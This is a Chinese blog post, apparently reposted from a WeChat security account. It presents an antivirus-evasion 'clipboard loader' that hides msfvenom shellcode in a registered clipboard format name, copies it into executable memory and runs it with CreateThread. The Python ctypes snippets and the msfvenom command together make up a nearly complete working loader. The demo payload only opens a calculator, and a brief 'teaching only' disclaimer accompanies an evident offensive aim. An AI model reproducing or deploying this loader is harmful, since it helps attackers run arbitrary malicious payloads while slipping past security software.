【干货】花里胡哨免杀之《剪切板加载器》

admin 2021年9月21日11:13:35评论247 views字数 2619阅读8分43秒阅读模式

一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚


 前言 


最近研究内存加载器魔怔了,我们知道所有内存加载器原理都一个样:申请可执行内存->shellcode写入内存->执行该内存

申请内存还是比较好说的,去win开发手册搜搜就能找到很多申请内存的api,然后使用VirtualProtect将申请的内存区块设置为可执行即可

执行内存里面的内容也好说,使用CreateThread创建一个进程是常用的,或者使用EnumSystemLocalesA等回调函数直接运行也是可以的,这种回调函数在开发手册也随处可见

困难的是怎么把shellcode写入内存当中,在之前写入内存都是用RtlMoveMemoryRtlCopyMemory等函数,后来爆出一种UUID方式写入内存,我自己又延伸了MAC、IPV4、IPV6方式写入内存、再然后我发现读取注册表REG可以将内容写入内存。真是越走越远,越走越花里胡哨。。。

剪切板


什么是剪切板:剪切板是一组功能和使应用程序来传输的数据消息。由于所有应用程序都可以访问剪贴板,因此可以轻松地在应用程序之间或应用程序内传输数据。

剪切板格式:我们复制粘贴操作的对象有很多种,比如文字,图片,程序等等。每种类型的对象对应不同的剪切板格式,但这些格式都是已经定义好的,每个格式对应不同的标识值。

注册剪切板格式:顾名思义我们可以注册一个新的剪切板格式来存放我们的数据

剪切板加载器


没错,我发现了一种写入内存的方式
昨天等项目的时候,无聊又去逛了逛win开发手册,看到了我们经常用的剪切板的各类api函数
我就随便逛了逛,哎?发现一个函数GetClipboardFormatName
【干货】花里胡哨免杀之《剪切板加载器》
能写入东西到缓冲区?这不来了吗

函数介绍

RegisterClipboardFormat
该函数是user32.dll库中的函数,用来注册新的剪贴板格式。然后可以将此格式用作有效的剪贴板格式
函数原型:
https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerclipboardformatw
UINT RegisterClipboardFormatW( LPCSTR lpszFormat);
lpszFormat参数是新格式的名称
注册成功则返回一个该格式对应的标识值
nameid = ctypes.windll.user32.RegisterClipboardFormatW('test')


GetClipboardFormatName
该函数是user32.dll库中的函数,可以从剪贴板中检索指定注册格式的名称,并将名称复制到指定的缓冲区。
函数原型:
https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getclipboardformatnamew
int GetClipboardFormatNameW(  UINT   format,  LPWSTR lpszFormatName,  int    cchMaxCount);
【干货】花里胡哨免杀之《剪切板加载器》

这个函数是大致功能我们可以看到啊,检索我们指定格式的剪切板,将它的名称写入缓存区

ctypes.windll.user32.GetClipboardFormatNameW(name,ptr,len)

写加载器


上面两个api函数一个是创建剪切板,一个是读取剪切板的名
我们如果用shellcode命名该剪切板,当我们读取该名称时不就可以将shellcode写入缓存区了?
首先生成shellcode,这里生成要注意排除x00字符,防止被截断。
msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -b="x00" -f py -o 123.py
【干货】花里胡哨免杀之《剪切板加载器》
然后申请一块内存
ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(buf)+1, 0x3000, 0x40)
使用shellcode当做名称,注册一个新的剪切板格式这里shellcode一定排除x00字符,不然名称会被截断。(测试发现名称长度不能大于500字节)
name = ctypes.windll.user32.RegisterClipboardFormatW(buf)
获取该剪切板格式的名称,并写入申请的内存
ctypes.windll.user32.GetClipboardFormatNameW(name,ptr,len(buf)+1)
然后创建进行运行即可
handle = ctypes.windll.kernel32.CreateThread(0,0,ptr,0,0,0)ctypes.windll.kernel32.WaitForSingleObject(handle,-1)
测试


使用py版本2.7,msf生成64位弹计算器payload
【干货】花里胡哨免杀之《剪切板加载器》
成功运行

源码公众号回复:剪切板加载器


【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细 | 钟馗之眼】ZoomEye-python命令行的使用

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

  记一次HW实战笔记 | 艰难的提权爬坑

走过路过的大佬们留个关注再走呗【干货】花里胡哨免杀之《剪切板加载器》

往期文章有彩蛋哦【干货】花里胡哨免杀之《剪切板加载器》

【干货】花里胡哨免杀之《剪切板加载器》

一如既往的学习,一如既往的整理,一如即往的分享。【干货】花里胡哨免杀之《剪切板加载器》

如侵权请私聊公众号删文



本文始发于微信公众号(渗透Xiao白帽):【干货】花里胡哨免杀之《剪切板加载器》

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月21日11:13:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【干货】花里胡哨免杀之《剪切板加载器》https://cn-sec.com/archives/548451.html

发表评论

匿名网友 填写信息